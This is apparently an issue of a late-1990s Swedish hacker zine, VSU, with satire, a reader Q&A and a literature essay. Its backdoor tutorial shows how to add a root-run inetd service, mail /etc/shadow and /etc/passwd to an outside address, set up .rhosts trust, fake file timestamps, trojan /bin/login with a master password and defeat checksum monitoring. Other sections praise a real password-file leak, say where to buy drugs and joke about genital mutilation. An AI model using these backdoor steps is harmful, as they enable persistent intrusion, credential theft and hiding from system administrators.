någonsin + stora delar av 2600-redaktionen + ett antal pensionerade SHA-
medlemmar som fick ett hackeråterfall för att slippa undan villaområdets gråa
tristess. (Varför fick man inte se någon bild på den där nedfläckade klän-
ningen i media förresten? Normalt sett brukar de ju jobba hårt på att hitta
bildmaterial, som illustrerar texterna de skriver.)
"Den unge mannen var så ironisk, att jag blev tvungen att gripa honom."
(replik ur operan Tosca)
Ironin får aldrig ta slut. Knesset och Seinfeld är våra upplysta förebilder,
som har lärt oss att vara totalt BETYDELSEBLINDA och prata lika länge och lika
allvarligt om hål i strumpor som om atombomber. Ironisk religion är en bra
idé: "Ja, jag tror verkligen JÄTTEMYCKET på Gud, PRECIS hela tiden!" Ironisk
kärlek också: "Ja, jag ÄLSKAR DIG JÄTTEMYCKET! Det är ju inte alls så att jag
bara håller dig i handen för att få knulla senare, och det är ju inte alls så
att du bara har tagit första bästa ingenjör för pengarnas skull." (Det är
ingen tillfällighet att de svenska orden "fästman" och "fästmassa" börjar med
exakt samma bokstäver.)
Vi letar ständigt efter nya kickar för att bota tristessen. I fortsättningen
ska vi bara ha sex med omskurna afrikanska kvinnor. (Vadå "det gör fruktans-
värt ont för dem"? Det är väl ändå inte VÅRT JÄVLA PROBLEM!) Det som gällde
1997 gäller sällan 1998. "Heroin is so passe", som det står i visan.
Baruch Spinoza uppfann hypertextlänkarna i sitt stora filosofiska verk
"Etiken", där han länkar frenetiskt fram och tillbaka.
"I would like to thank Ron and everybody out there in the office who is
responsible for getting my favourite suit in the whole world back from those
people at the laundromat. Thank you very much. I sewed it up myself. I ran out
of thread round about *here*, but it's OK. These people kept my suit since
last April. They wouldn't give it back to me."
- Michael Stipe / R.E.M., under en livekonsert i Universal Amphitheatre, Los
Angeles den 30/9 1986
En belysande liknelse, för att ni verkligen ska förstå den totalt rulande
visdomen i det vi har att komma med: Tänk dig en liten svensk igelkott som
heter Igge, och som har en flickvän som heter Iggelina. Precis som alla andra
igelkottar så har de aldrig riktigt fattat att det där med att fälla ut sina
taggar för att skydda sig mot omvärldens faror inte fungerar så bra när man är
mitt ute på en motorväg och en massa bilar närmar sig. Jag har ingen som helst
poäng med den här liknelsen. Jag bara skriver en massa skit för att ni ska bli
irriterade på mig.
Som ni har märkt är vi inte nöjda med samhället. Saker borde vara mycket
mycket 0ndare! Folk borde strunta i att gå till jobbet, och runka med den fula
blågula svenska flaggan istället. Är det då ingen del av samhället som vi
uppskattar, förutom undergroundsfären? Svar: Jomen, matproduktionen är helt
OK! Då tänker jag inte på de pjåkiga bönder som pratar om "lyckliga hönor som
får gå ute i sin naturliga miljö", utan på de vanliga tuffa bönderna som har
olyckliga hönor som proppas fulla med antibiotika och lider inne i sina
minimala burar! TUFFHET! 0NDSKA! Vi skulle inte kommit på något ondare och
värre, hur länge vi än hade smitt våra jävulusiska planer! Maximal respekt
till Sveriges alla 0nda bönder!
// Ulf of VSU
------------------------------------------------------------------------------
NYBÖRJARHACKING: BAKDÖRRAR
-========================-
OK, du har roffat åt dig en jämrans /etc/shadow-fil med någon 0nd teknik. Du
har knäckt lösenorden i den filen med något 0nt program. Du har loggat in på
systemet, och tagit över det - du har blivit r00t med någon 0nd exploit.
Hur gör man sedan för att kunna fortsätta använda detta konto länge? Jo, man
installerar en eller flera bakdörrar! Det har du säkert läst om i en och annan
sensationslysten hackerbok ute på marknaden. Idén bakom detta är att om
sysadminen upptäcker att han har fått in en massa hackerohyra och börjar byta
lösenord och ta bort buggiga CGI-skript och uppdatera iChat-servrar och
mountd-demoner och annat osorterat bråte som ligger och skräpar, så ska du
fortfarande ha en chans att komma in. Du gömmer olika tjänster i systemet som
du kan köra utifrån så att du kan komma in igen.
Detta kan göras på olika sätt. En klassiker i sammanhanget är att skapa en ny
TCP/IP-tjänst på datorn som du har hackat. Det låter svårare än vad det är.
Man blir r00t på ett system (för att kunna editera olika filer obehindrat),
och sedan redigerar man två filer, /etc/services och /etc/inetd.conf ..
Här följer ett exempel. I detta exempel skapar vi en ny TCP-tjänst, som heter
http2 och som svarar på port 37337!
I /etc/services ska du lägga till en rad som kan se ut något i den här stilen:
http2 37337/tcp http2
Denna rad säger att systemet kör en tjänst som heter http2, och att man kan
anropa denna med en TCP-uppkoppling till port 37337. (Ni kan ju iofs välja
något annat nummer - det där är ju lite uppenbart för folk som vet något om
hackers och B1FF och sådant.) På många system är dessa tre fält inte ihop-
skrivna som ovan, utan snarare uppspaltade i kolumner, och då ser det ju bäst
ut om du gör det också. På vissa system är de olika raderna i denna fil
sorterade efter portnummer, och då ser det bäst ut om du lägger in raden på
sin rätta plats.
I /etc/inetd.conf ska du lägga till en rad som kan se ut något sådant här:
http2 stream tcp nowait root /bin/sh sh /lang/jamrans/sokvag/http2.svin.apa
Den första kolumnen (http2) säger att det är det protokollet som det är frågan
om. Det är bra att välja något protokoll som finns (som HTTP), och lägga till
något versionsnummer som är alldeles för högt och betecknar någon version av
HTTP som inte har kommit ännu (som HTTP/2.0). Då ser det vid första anblicken
ut som en helt laglig del av filen, som sysadminen tycker ska vara där. De
följande två kolumnerna (stream och tcp) säger att det är en TCP-uppkoppling
det är frågan om. Den fjärde kolumnen (nowait) anger om kommandot ifråga ska
köras en gång eller upprepade gånger. Skriv inte wait i den kolumnen, för då
kommer din 0nda bakdörr att köras ett oändligt antal gånger, istället för en
gång! Den femte kolumnen (root) anger vilken användare i systemet som
kommandot ska köras som. Den sjätte kolumnen (/bin/sh) anger vilket program
som ska köras. Resten av raden (sh /lang/jamrans/sokvag/http2.svin.apa) anger
vilken kommandorad som /bin/sh ska köras med.
Även för /etc/inetd.conf-filen gäller att man kan behöva placera in ovan-
stående rad på någon plats i filen där den passar in.
Sökvägen /lang/jamrans/sokvag/http2.svin.apa är bara menad som ett exempel.
Här skriver du istället någon lämplig fil, som inte redan finns i systemet och
som ligger långt bort i någon undanskymd katalog med några filer som ingen
kommer att rensa bort men som ingen heller tittar på särskilt ofta. Ge filen
ett namn som passar in bland de andra namnen i katalogen. En del människor
tror att man ska lägga bakdörrar i /tmp-katalogen. Det är dumt, eftersom denna
katalog rensas på många UNIX-system när de bootas om, och poängen med en
bakdörr är ju att den ska finnas där och fungera när du behöver den om flera
månader.
Sedan skapar du filen i fråga, antingen den heter http2.svin.apa eller något
annat. Denna ska innehålla kommandon till /bin/sh, där hela sökvägarna till
alla kommandon och filer bör finnas med. Den ska inte ha någon inledande
kommentarrad som anropar /bin/sh, eftersom vi redan har gjort detta anrop. Ett
exempel på innehåll i denna fil:
/bin/cat /etc/shadow | /bin/mail ewuyrewu@kurir.net
/bin/cat /etc/passwd | /bin/mail ewuyrewu@kurir.net
Kontot på kurir (eller hotmail eller något sådant) skapar du just för att ta
emot lösenordsfiler från systemet. Andra roliga saker man kan göra här är att
lägga till 0nda rader i .rhosts eller hosts.equiv-filer så att man kan logga
in på systemet med rlogin utan att behöva några lösenord, eller att lägga upp
en kopia av systemets /etc/shadow-fil i deras webserverkatalog under ett
filnamn som det inte finns några länkar till någonstans. Då kan vem som helst
som vet om URL:en hämta ner /etc/shadow-filen därifrån, men den märks inte för
de som inte har fått URL:en. Kom ihåg att dessa kommandon körs som root, så du
kan köra vilka kommandon som helst i den här filen. Var kreativ (och 0nd!).
Inetd-demonen som sköter de flesta TCP/UDP-uppkopplingar till UNIX-system (men
inte riktigt alla, exempelvis HTTP-servrar brukar klara sådant där själv för
hastighetens skull) fattar lite trögt. Den märker inte att man ändrar på
/etc/services och /etc/inetd.conf, så man måste säga till den. Det gör man
genom att skicka en HUP-signal till den. Då läser den in filerna igen, och
fortsätter sedan att jobba som om inget hade hänt.
Hur skickar man en HUP-signal till inetd-demonen? Jo, först måste du veta
vilket processnummer som inetd-demonen har. Det får du reda på med kommandot
"ps". Detta har olika parametrar i olika dialekter av UNIX. Du kan prova med
"ps aux |more" och "ps -Af |more". Den siffra som står på samma rad som
inetd är processnumret. Sedan skickar man en HUP-signal med kommandot
"kill -HUP numret".
Sedan ska det fungera! Prova genom att telnetta till systemet på port 37337
eller någon annan port som du har valt. Systemet ska koppla upp och sedan
koppla ner inom en sekund. Kontrollera nu att allt som ska utföras i din
bakdörr verkligen har körts, att alla mail har skickats och att alla .rhosts-
grejer och webändringar har genomförts.
En extra finess är att ändra alla dessa filers ändringsdatum, så att det inte
syns så tydligt att du har ändrat dem just idag. Det gör man med kommandot
"touch -t tid filnamn", där tid har formatet 199505301122 för klockan 11:22
den 30:e maj 1995. Då kommer det att se ut som om filerna senast ändrades
denna tidpunkt, om någon tittar på filerna med kommandot "ls". UNIX-system har
flera tidsangivelser för varje fil, och detta ändrar inte på alla dessa, så en
elitsysadmin kommer att märka att tiderna är ändrade. Å andra sidan är det
troligt att en elitsysadmin vet vad /etc/services och /etc/inetd.conf är för
filer, och att han/hon också vet att HTTP/2.0 inte finns, så när det gäller
mer kunniga människor får du hitta på tuffare bakdörrar än så här.
Vad finns det för bakdörrar som är tuffare? En rolig grej är att ändra olika
systemprogram som /bin/login eller telnetd-demonen eller något annat, så att
de ser ut att fungera som vanligt men har någon liten extra finess (som att
man alltid kan logga in som root om man anger lösenordet "VSURULAR", oavsett
vad root egentligen har för lösenord). Detta kräver att du har tillgång till
källkoden för det program du vill ändra, för exakt den version av operativ-
systemet som datorn som du hackar kör. Det är viktigt att det är exakt rätt
version, för annars kan saker börja krångla och då kommer de definitivt att
misstänka att de fått hackare i sina maskiner. Om de kör Linux kan det tänkas
vara lätt att få tag på dessa källkoder, men om de kör HP-UX eller någon annan
kommersiell UNIX kan det vara svårare. När du har fått tag på denna källkod
gör du bara erforderliga ändringar och kompilerar programmet.
Finns det några metoder för sysadminmänniskor att upptäcka ändringar i dessa
systemfiler (/etc/services och /etc/inetd.conf)? Ja. Förutom den manuella
metoden (att gå igenom filerna med "more" då och då, och se om någon har gjort
något styggt) finns det program som automatiskt med jämna mellanrum räknar ut
en checksumma på vissa filer, jämför den uträknade checksumman med en gammal
checksumma som är lagrad i en fil, och slår larm om checksummorna inte
stämmer. Ett populärt sådant checksummessystem heter MD5. Teoretiskt sett
borde det ju gå att hacka MD5 efter att man har blivit root, och ta bort det
eller rent utav fejka filen där checksummorna lagras, så att MD5 fortfarande
är igång men tror att allt är OK även när det inte är det. (Vi kanske kan
återkomma till detta i något kommande nummer.)
Det var meningen att det skulle vara ännu mer tekniska artiklar i detta sjätte
VSU-nummer. Jag har hållit på med TCP/IP och 0nda IP-datagram och det gamla
goda ultravåldet den senaste tiden, och det var meningen att åtminstone ett av
de program jag håller på att utveckla skulle vara med i det här numret. Men
det sket sig, eftersom UNIX-systemet där jag utvecklar dessa program krånglade
ovanligt mycket. Men mycket TCP/IP-material utlovas alltså, i nästa VSU.
Tills dess, kom ihåg att våga vägra fönstergränssnitt med ikoner, möss och
annat skräp! KOMMANDORADEN ÄR NÖRDENS NIRVANA, LJUSET I TUNNELN SOM VI ALLA
STRÄVAR EFTER ATT NÅ!
// Ulf of VSU
------------------------------------------------------------------------------
TELIAHACKET
-=========-
En kort tid efter att vårt förra nummer kom ut genomfördes det kanske tuffaste
hacket i Sverige någonsin. Jag talar naturligtvis om Teliahacket!! Ett gäng
17-åringar tog sig in i Telias maskiner genom deras POP-mailserver. Denna
mailserver var utvecklad av Qualcomm, och hade en buffer overflow-bug som
numera är fixad. (Buffer overflow-buggar uppstår när inkompetenta
programmerare definierar att en sträng max ska vara ett visst antal tecken
lång, och sedan glömmer bort att kolla att det som kopieras in i strängens
utrymme i minnet inte får vara längre än så. Om man skickar en speciell sträng
till programmet, som har ett kort assemblerprogram på ett strategiskt viktigt
ställe i strängen, kan man som utomstående få en server att utföra valfritt
kommando. Motsvarande teknik används på datorer där man har ett konto som inte
är root, om man vill bli root. Då skickar man speciellt uppbyggda strängar
till program som är SUID root.)
Sedan tog de fram giltiga lösenord till alla 197 000 konton som de fick tag i.
Telias gamla lösenordsalgoritm var korkad, så det var enklare än vad det
skulle ha varit på ett UNIX-system. Den färdiga filen, med 197 000 användar-
namn och lösenord lades ut på Internet. För att visa syftet med detta hack
skrev de också ett meddelande om att Telia borde införa "flat rate", längst
upp i textfilen.
Media gick igång på detta på allvar. TV-nyheter och dagstidningar som normalt
sett rapporterar väldigt litet om datorunderground tog upp detta. Telia fick
även förklara sig för Datainspektionen.
Jag tror ju inte att Telia kommer att införa "flat rate", bara för att några
hackers säger åt dem att de vill ha det. Om de åker fast för detta kommer de
förmodligen att få grova straff. Men iallafall, vilket tufft hack! Ord!!
Titta gärna på hackets officiella hemsida (http://surf.to/telia020) som har
olika länkar till textfilen på olika sites, fler länkar till artiklar om
hacket i massmedia, och en Java-applet där man kan röja runt med hr Arnestigs
ansikte ;) .. Det fanns också en annan websida förut, som hade teknisk
information om Telias konton, med olika algoritmer och knäckningsprogram som
man kunde ladda ner, men den är tyvärr nerlagd.
Lösenordsfilen finns fortfarande att få tag på. Att försöka använda något av
de Telia 020-konton som finns med i den rekommenderas inte, eftersom Telia har
varit snabba med att både byta ut lösenord och att busta folk som använder
lösenorden olovligt. Men den finns att ladda ner här och där, för er som vill
ha kvar den som en souvenir från ett av de tuffaste hacken någonsin i
Sverige.
// Ulf of VSU
------------------------------------------------------------------------------
Q & A
-===-
Hej och välkomna till vår astuffa frågespalt. Här svarar vi på några frågor
som vi har fått sedan sist. Skicka gärna in flera frågor, på vår fina adress
harnhammar@yahoo.com ..
(1)
Kära VSU,
nu har man återigen suttit framför televisionapparaturen och sett politiker
spy sin korrumperade väljar-exploitkod likt svart galla över tilltänkta offer
(läs pensionärer, ungdomar, invandrare, barnfamiljer, ensamstående mödrar) men
nu var det något som inte stämde.. Det hade dykt upp ännu ett hot ur det
slemmiga västkustavloppet i form av en programledare för ett så kallat
"underhållningsprogram" vars grundläggande funktion är att förruttna hjärnorna
samt tanka pengar från de dumma massorna. Han satt helt enkelt bara där och
insöp bajsätarnas exploits i syfte att utveckla det ultimata takeoverscriptet.
Han hade förberett det hela skickligt genom att i sina program bryta ner folks
mentala motståndskraft med dansbandsmusikstortyr å det grövsta för att sedan
muta de få opåverkade med några miljoner hit och dit, vilket fick folket att
tro att det rörde sig om en "go gubbe", och inte ännu en antikrist som vi
klarsynta förstod. (Det var rätt enkelt egentligen.. Den utpekade
nöjesprofilen hade nämligen mustach och det hade även Hitler, så det så!) När
det väl är dags för val så kommer detta monster att slunga sig upp likt
gårdagens middag på barrikaderna och påminna massorna om att pengar är den
enda lyckan och att de egentligen skiter i politiska frågor. De skall ge honom
makten för han har cashen, och har någon en åsikt så är det bara att köra ner
en fet sedelbunt i käften på dissidenten så blir han glad. Sedan tvingas
Sveriges invånare att gå runt utklädda till lila björnar under en massiv
bombard av dansbandsmusik..
Nu till min fråga:
Vad skall jag göra?
Säg inte att jag skall prata med någon vuxen eller kuratorn. Jag har redan
försökt det, men de var inblandade i konspirationen och sa att jag var galen
och ville låsa in mig. Jag kämpade för mitt liv och undkom..
// 94n1/<
Svar:
Det här är en mycket viktig insändare för alla som är det minsta intresserade
av politik. Klarsynt beskriver den hur det egentligen är i Sverige idag.
Några små tillägg: nöjesprofilen i fråga intervjuade alla våra partiledare i
TV kort innan valet. Kan det vara för att han skulle komma åt att söva ner dem
och operera in radiosändare i deras hjärnor? Carl Bildt (MMMarabou) ville
först inte bli intervjuad. Kan det vara för att han hade genomskådat den 0nda
komplotten från villaområdena? Valstugorna vid Sergels Torg i Stockholm var
utplacerade mitt emot Sandy's, som vi redan har avslöjat som en av de
verkliga maktfaktorerna i komplotten. Tror ni att det bara är en
tillfällighet? Bevisen är överväldigande!
(Observera vad hårt vi anstränger oss för att skaffa oss ett rykte som ett
svenskt, hyperexcentriskt svar på Karl Koch. Ifrågasätt alltid allas motiv
till allt.)
Dessutom kan man verkligen undra varför denne nöjesprofils uschla TV-program
pågår så jämrans länge. Kan man kanske se det som ett slags buffer overflow-
funktion, som på alla dessa 0nda exploitz som man laddar ner från
http://www.rootshell.com/ och http://www.insecure.org/ eller något? Är det så
att om man sänder tillräckligt länge uppstår en buffer overflow i
massmänniskornas hjärnor, så att man kan ta över dem på rootnivå och få dem
att göra vad som helst? Detta kräver närmare forskning!
Vad man ska göra åt det? Ja, säg det. Själv tänker vi fortsätta som vanligt
med att leva på socialbidrag och knarka och hacka sönder UNIX-maskiner och
sända ut 0nda IP-paket på nätet och dra över horor.
(2)
Har ni någon syra att sälja?
// (jag har verkligen fått ett sådant brev, men namnet är bortcensurerat)
Svar:
Eh, jag TROR inte att jag tänker langa till folk som jag inte känner som hör
av sig till mig över nätet. Även om man har en tuff epostadress, typ
mephistophelez@unix-nrrrdz.org, är ju inte det någon garanti för att man inte
jobbar på Polisen. Det enda man bevisar genom att ha en sådan adress är att
man känner den som har registrerat den domänen, och även poliser kan ju
skaffa sig sådana kontakter, just för att nästla sig in bland hackers.
Men om du vill ha droger är ju http://www.smartdrugstore.com/ en bra lösning.
Annars kan man ju åka ner till Christiania en sväng, fast det blir jävla dyrt
om man bor i Norrland. Om man bor i Stockholm kan också Plattan på Sergels
Torg och diverse förorter med dåligt rykte långt ut på blå tunnelbanelinje
vara en lösning för wannabe-knarkaren.
(3)
Kan ni inte skriva mindre om politik och mer om datorer? Mina föräldrar bor
faktiskt i villa, så jag blir lite sårad när ni skriver så där. Jag är själv
ganska datorintresserad, men främst håller jag på med data för att kunna göra
karriär och tjäna mycket pengar som en riktig vinnare om några år. Jag har
satsat på Coad/Yourdons systemeringsmodeller och programmeringsspråket
SmallTalk, för det tror jag att näringslivet kommer att efterfråga i
framtiden.
// Runar of Villaområdet i Lotorp
Svar:
SVIN! APA! HAT! DÖ!
(4)
Jag såg att ni beskrev er gamla inriktning som "ironisk humor" i VSU#5. Är
även de texter i VSU som kritiserar kommersialiseringen av datorbranschen
menade som underhållning, eller finns det någon allvarligare undermening som
ligger bakom?
// W3ir0n of Ung Vänster, storkonsument av palestinaschalar och National-
teatern-skivor, medlem i Mikael Wiehes fanclub
Svar:
Den allvarliga undermening som finns där är samma som hos open source-rörelsen
(ni vet, GNU-projektet och Linux-människorna och de där). Vi tycker att alla
datorprogram bör spridas fritt och gratis med källkod, och att även all annan
information bör spridas fritt och gratis, och vara tillgänglig för alla. Vi
inser att det är annorlunda med andra delar av IT-branschen, och det är OK
att datorer, Internetuppkopplingar och support kostar pengar. Men med
programmen förhåller det sig lite annorlunda. Jag menar, det är ju inte en
tillfällighet att open sourceprogrammen i UNIX-världen är så pass mycket
bättre och säkrare än sina kommersiella motsvarigheter för Windows. (En av
många anledningar att slänga ut Windows och börja köra UNIX redan idag.)
Kolla gärna http://www.gnu.org/ och http://www.opensource.org/ om ni orkar
någon dag.
(5)
Hur packar man upp "upldbomb.tgz"? Det funkar junte med PKUNZIP! Förresten,
vet ni hur man hackar Telias hemsida?
// 3v17 M364 w4rr10R+++ / 73610n 0F 3x9701+zZZz
Svar:
SVIN! APA! HAT! DÖ!
// Ulf of VSU
------------------------------------------------------------------------------
EN AKADEMISK REDOGÖRELSE ÖVER VARFÖR TJUVSAMHÄLLET SUGER KUK
-==========================================================-
Här är en litteraturuppsats från en av kurserna som ingick i Engelska C, som
jag pluggade när VSU startade. En del av er kommer säkert att tycka att det
verkar skittrist, och en del andra är säkert inte tillräckligt bra på
engelska för att förstå poängen. Jag tycker ändå att innehållet i uppsatsen
har mycket med VSU att göra, så därför tar jag med den här.
Den här uppsatsen använder litteraturvetarens främsta verktyg: gamla
klassikerböcker från litteraturens kanon och resonerande runt dessa böcker på
ett teoretiskt plan, gärna med referenser till diverse filosofer. Poängen med
uppsatsen som inte är helt tydlig förrän i det sista stycket är att
argumentera mot civilisation och samhälle i allmänhet, och alla universitet
och högskolor i synnerhet, eftersom jag menar att mycket av det förtryck som
syns i de tre böckerna som jag skriver om uppstår just ur denna civilisation
och ur universiteten med deras logiska resonemang och just deras litterära
kanon.
Jag använder alltså litteraturvetarens verktyg mot litteraturvetaren själv!
Bland det mer rebelliska som jag har skrivit, enligt min egen åsikt.
Uppsatsen tar upp tre gamla klassiker av Hemingway, Twain och Faulkner. Även
den engelska titeln på min uppsats är förresten en pik till alla överdrivet
pretentiösa uppsatstitlar som alla akademiker brukar hålla sig med.
Här börjar eländet:
-------------------
Stockholm University
Department of English
The American Novel before 1945, Group II
Take-Home Exam
RELIGION, CAPITALISM, FREEDOM AND IDENTITY
IN THREE NOVELS FROM THE LITERARY CANON
Author: Ulf Härnhammar
Supervisor: David Minugh
In _The Adventures of Huckleberry Finn_ and _The Sun Also Rises_, as well as
in _The Sound and the Fury_, the environment that the protagonists exist in
is mostly one of untamed nature. It has got the same attributes that we
usually associate with it: it is emotional, wild and passionate - sometimes
(but not always) in a dangerous way. Every good story needs a conflict, and
in these three novels there is one between nature and human behaviour
governed by rules, as in the religious and economic themes that feature
prominently.
In _The Adventures of Huckleberry Finn_, Huck and Jim have got their own set
of morals that differ from the morals in the society that they live in.
According to Swahn, to live on a raft is to be free, but as a cold
counterweight against this freedom, they have brought the facts of money and
power abuse along on their journey (Swahn in Twain, 300). At one point, Twain
even makes it obvious that nature is in fact very powerful and controls life
and death: Huck and his father disappears, and everyone thinks that they are
dead, while they are in fact hiding out in the woods.
In _The Sound and the Fury_, characters such as Caddy, the female Quentin and
Benjy are all governed more by emotion than by thought. Both Caddy and the
female Quentin have sex when they want to, as opposed to Gerald and his
friends at university who see those things more as a vehicle to further their
career. There are even hints of an incestuous relationship between Caddy and
the male Quentin (Faulkner, 279). As the female Quentin puts it: "I dont care
[...], I'm bad and I'm going to hell, and I dont care. I'd rather be in hell
than anywhere where [Jason is]" (Faulkner, 207). Caddy's father is not really
one of these emotional characters, but he does drink himself to death. They
even have to castrate Benjy (Faulkner, 270), to be able to control his
emotional life.
In _The Sun Also Rises_, the characters go back and forth between emotional
and cold behaviour. They behave differently in Spain, when faced with the raw
emotion of the bull fighting, than they did back in France. There are also
points of similarity between the freezing out of Cohn, after he dares to show
some real emotion, and the bulls' rejection of the steer in the fights.
This type of emotional behaviour that I have described in the previous few
paragraphs can be defended by several philosophical and political theories.
Friedrich Nietzsche's theories of the revaluation of all values, "the essence
of the world is the will to power" and the doctrine of the uebermensch fit
particularly well (Filosofin Genom Tiderna: 1800-talet, 134-137), especially
as he disliked Christianity as much as Caddy or Brett do. Nietzsche also
thought it fatal to disregard the Dionysian element - the wild and ecstatic,
and that the purely intellectual, analytical tradition is devastating
(Fredriksson, 191). David Hume with his theories about passion and Rousseau
with his noble savage are two other philosophers who also thought it more
important to listen to your emotions than to follow rules (Filosofin Genom
Tiderna: 1600- och 1700-talet, 263-264). There are also some political
ideologies like neo-liberalism or anarchism that want more freedom for the
individual, which allow people to follow their emotions more than they do now
(Larsson, 82, 112).
If we leave the characters governed by emotion behind and concentrate on the
colder characters, we have Emmeline in _The Adventures of Huckleberry Finn_,
who dies with a painting featuring too many arms (Twain, 137), as she cares
more about how things look than whether the whole painting does communicate
anything emotionally true. Mrs Hotchkiss in the same novel does not come
across as a very open-minded and free-spirited person either (Twain, 355),
and somehow we understand Huck when he chooses to go on travelling instead of
spending the rest of his life listening to her. In the same collective of
people who think too much and do not listen to their feelings, we also have
Tom Sawyer, who according to Swahn is poisoned by literature and incapable of
seperating between fiction and the real world, thus trying to force the rules
of fiction on the real world (Swahn in Twain, 300). Huck's fellow companions
continue on the same unemotional theme when they show unbelievable cruelty by
selling Jim for 40 dollars.
In the same way, people in _The Sun Also Rises_ are false enough to have
friends or even wives that they do not really like, and the French people in
the book are prepared to like anyone who give them lots of tips (Hemingway,
245). The set-up boxing-matches (Hemingway, 77) and the fire baloons that
people fail to send up (Hemingway, 187-188) serve as a fitting background to
the failure of civilization.
In _The Sound and the Fury_, Jason tries very hard to follow the rules
dictated to him by the economic and religious worlds, but it does not make
him very happy, nonetheless. When the male Quentin tries to help the poor
girl, everyone thinks that he is going to abduct her (Faulkner, 144 ff), as
they all live in a world where altruism does not exist.
When we talk about the rules that religion dictate, it is important to note
that free will has to exist for the concept of good or bad behaviour to be
meaningful. In a monist and singular world such as the one described by
philosopher Spinoza (Filosofin Genom Tiderna: 1600- och 1700-talet, 118),
where everything is one substance and where everything is predetermined, the
concept of good behaviour is meaningless. Spinoza thought that we are not
able to do anything God does not want us to, as God is the world. Obviously
Benjy has not made the choice to become what he is, but has Caddy or the
female Quentin done such a choice?
There is also a lot of playing around with identity in these novels.
Huckleberry dresses up like a girl, and later he pretends to be Tom and Tom
pretends to be Sid. Of course, his fellow travellers also make it obvious
that anyone could pretend to be a king or learn to behave like a Harvard
graduate. In _The Sound and the Fury_, people's names get changed and
re-cycled a lot. Identity is something very fluid, like in the very
interesting part of _The Adventures of Huckleberry Finn_, where Jim and Huck
say that the French speak French and that cats do not speak like cows (Twain,
108-109). There is a difference, however: the French have learned to speak
French, while the language of cats are ruled by their genes. This reminds us
of Aristotle and his theory of the substance, the first of his ten
categories, the essence of a thing (Filosofin Genom Tiderna: Antiken,
Medeltiden, Renässansen, 165-166).
The oppression described in all these novels are not built into people's
genes the same way that cows have to make certain sounds. The dualism that is
the topic for this essay causes oppression, but this is something temporary
that we can change. We have to remember that the satisfaction that Gerald's
mother gets out of her son's career choices is in many aspects similar to the
satisfaction that Benjy gets out of looking at his favourite mirror. Harvard
is just a dead word (Faulkner, 193), signifying nothing.
BIBLIOGRAPHY
PRIMARY SOURCES
Faulkner, William. _The Sound and the Fury & As I Lay Dying_. New York:
Random House, 1946.
Hemingway, Ernest. _The Sun Also Rises_. Stockholm/London: Zephyr Books,
1947.
Twain, Mark. _The Adventures of Huckleberry Finn_. Stockholm: Zephyr Books,
1944.
SECONDARY SOURCES
_Filosofin Genom Tiderna: 1600- och 1700-talet_. ed: Marc-Wogau, Konrad.
Karlshamn: Thales, 1992.
_Filosofin Genom Tiderna: 1800-talet_. ed: Marc-Wogau, Konrad. Karlshamn:
Thales, 1993.
_Filosofin Genom Tiderna: Antiken, Medeltiden, Renässansen_. ed: Marc-Wogau,
Konrad. Karlshamn: Thales, 1991.
Fredriksson, Gunnar. _20 Filosofer_. Stockholm: Pan/Norstedts, 1997.
Larsson, Reidar. _Politiska Ideologier I Vår Tid_. Lund: Studentlitteratur,
1990.
Swahn, Sven Christer. (an essay on _Huckleberry Finn_). Published in: Twain,
Mark. _Huckleberry Finns Äventyr_. Stockholm: Klassikerförlaget Niloe, 1992.
// Ulf of VSU
------------------------------------------------------------------------------
......
-====-
Kibo.
Fnord?
Commodore Teenage Riot! En av en miljon exakt likadana svenska $ofia-flickor
ramlade ner i en flera kilometer djup gatubrunn, och sedan var det bara
999999 exakt likadana svenska $ofia-flickor kvar. Unge man nu schka ja
berätta förej va live' går upå! Klart grabben ska ha en SCUD-missil! Monique,
take the tigers away!
// Ulf of VSU